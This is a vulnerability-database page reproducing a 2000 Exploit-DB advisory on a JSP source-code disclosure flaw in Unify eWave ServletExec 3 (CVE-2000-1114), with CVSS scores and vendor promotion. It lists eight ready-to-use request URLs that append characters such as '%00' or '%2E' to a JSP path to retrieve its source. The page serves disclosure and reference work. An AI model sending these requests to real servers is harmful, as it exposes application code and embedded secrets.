Lucene search
+L

Unify eWave ServletExec 3 - .JSP Source Disclosure

🗓️ 21 Nov 2000 00:00:00Reported by Wojciech WochType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Unify eWave ServletExec discloses JSP source code via specific HTTP requests, exposing sensitive data.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2000-1114
19 Dec 200005:00
cve
cvelist
Cvelist
CVE-2000-1114
19 Dec 200005:00
cvelist
euvd
EUVD
EUVD-2000-1099
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-1114
9 Jan 200105:00
nvd
source : https://www.securityfocus.com/bid/1970/info

Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.

ServletExec will return the source code of JSP files when a HTTP request is appended with one of the following characters:

.
%2E
+
%2B
%5C
%20
%00

For example, the following URL will yield the source of the specified JSP file:

http://target/directory/jsp/file.jsp.

Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.

Any of the following URL requests will yield the source of the specified JSP file:

http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02915
26